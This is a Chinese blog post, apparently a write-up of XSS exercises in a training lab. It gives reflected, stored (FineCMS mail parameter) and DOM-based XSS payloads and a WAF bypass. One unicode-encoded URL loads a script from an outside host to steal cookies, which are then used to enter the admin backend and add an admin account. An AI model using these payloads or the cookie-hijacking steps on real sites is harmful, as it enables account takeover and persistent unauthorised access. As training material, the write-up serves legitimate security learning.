freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

【封神台】前端渗透 XSS wp
G孤桜懶契Y 2021-08-05 13:54:59 139719

前言

掌控安全里面的靶场前端渗透/XSS,学习一下!

反射型XSS

环境:http://b-ref-xss-1s.lab.aqlab.cn/

了解一下

一般证明XSS是否存在,就是在正常页面传参然后构建参数让他弹窗就是存在XSS了
XSS一般在什么业务场景容易遇见?
重灾区:评论区、留言区、个人信息、订单信息等。
针对型:站内信、网页即时通讯、私信、意见反馈。
存在风险:搜索框、当前目录、图片属性等。

遵循一个原则,见框就X

image-20210805092731188

发现并没有什么反应,审计元素看看代码F12

image-20210805092837982

输入双引号发现被转义了,那就输入单引号来闭合

' oninput=alert(/xss/)

image-20210805093254599

用\转义,或者用//来注释都行

' oninput=alert(/xss/) \

image-20210805093354847

接着输入一个任意字符就可以拿flag

image-20210805093436060

存储型XSS

环境:http://59.63.200.79:8082/

先打开看看,发现是FineCMS v5.3.0,因为提示是存储型XSS。百度一下,看看有没有相关的漏洞

image-20210805093636171

百度了一下,发现这个cms邮件处url有xss漏洞

payload

http://59.63.200.79:8082/index.php?c=mail&m=<script>alert(/xss/)</script>

image-20210805094003613

因为这个邮件是直接发给管理员,根据说明,所以我们得想办法窃取管理员cookie进入后台。

先找一个xss平台导航

image-20210805100643223

注册一个账号,然后进去创建一个新项目

image-20210805100727610

我们只是获取cookie,就选超强默认模块基础默认模块,有兴趣可以看看他们说明

image-20210805100830687

就用最短代码吧

image-20210805100905290

payload

http://59.63.200.79:8082/index.php?c=mail&m=极限最短代码

image-20210805100954668

刷新一下项目页面就收到了cookie了,因为有robot自动访问后台,得到flag了。

image-20210805101110064

根据cms源码可以知道管理员路径是admin.php,我们尝试用cookie登陆下后台

member_cookie=d256812b83f3751716e6
member_uid=1

将这个两个cookie值加入

image-20210805102514228

接着我们再访问管理员页面

http://59.63.200.79:8082/admin.php

image-20210805102545578

然后就是基本操作,添加一个管理员账户,以后就不用cookie了

image-20210805102705599

DOM型XSS

环境:http://59.63.200.79:8014/dom_xss/

注意:被waf拦截就将cookie清空

了解一些基础知识

DOM XSS注入核心代码document,程序和脚本可以通过dom接口来修改前端网页

document.cookie 读取网页cookie,可设置cookie

document.domain 返回当前IP

document.lastModified 获得页面最后修改时间

document.write向文档中写入HTML或JS代码

一打开靶场,检查了下元素,就看到document.write

image-20210805103724506

试了下,这个write截取浏览器后面输入的所有字符串向文档写入然后当做代码执行,因为我们访问浏览器的时候,是生成了文档页面的所以,这个dom型就是向文档中写入代码,然后被页面执行

image-20210805103901000

尝试一下恶意代码,估计过滤了script被waf拦截了

image-20210805103936688

所以有两种做法,第一种是绕过waf,因为这个waf太老了,绕了也没啥意义但是还是给个payload

http://59.63.200.79:8014/dom_xss/index.php/.txt?id=<img src=x onerror=alert(/dom-xss/)

image-20210805104907949

因为DOM型XSS也是只能在该页面插入html代码,所以这个也是反射型的一种,我们用另一种方法,因为js能解码native编码

直接去导航站长工具

image-20210805105557481

找到native编码互转

image-20210805105624726

可以直接绕过

image-20210805105655587

这样就会出现一个问题,反射型和dom型XSS怎么利用?一样的构造一个url让其他人点一样可以获取cookie,将我们的极限短xss代码转换为native形式

image-20210805110006489

测试一下是否有用,访问了一下,明显拿到我自己电脑的cookie和信息了

http://59.63.200.79:8014/dom_xss/?id=\u003c\u0073\u0043\u0052\u0069\u0050\u0074\u002f\u0053\u0072\u0043\u003d\u002f\u002f\u0078\u0073\u002e\u0073\u0062\u002f\u006f\u0050\u0036\u0078\u003e

image-20210805110120932

所以我们想要利用个反射型的xss得先打开建议和投诉页面http://59.63.200.79:8014/dom_xss/dom.html,然后将我们构造的恶意代码发给客服机器人,访问我们就可以获取管理员cookie

image-20210805110334088

刷新一下我们的xss项目平台,获取到了cookie

image-20210805110425417

我的个人博客

## 孤桜懶契:http://gylq.github.io

# 渗透测试 # web安全 # 数据安全 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 G孤桜懶契Y 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
封神台靶场
G孤桜懶契Y LV.4
这家伙太懒了,还未填写个人描述!
  • 11 文章数
  • 11 关注者
基于在线靶场的Apache Log4j任意代码执行复现
2021-12-20
CS4.4绕过vultr特征检测修改checksum8算法
2021-12-03
[封神台]Cobalt strike超简单自动化拿域控!
2021-09-10
文章目录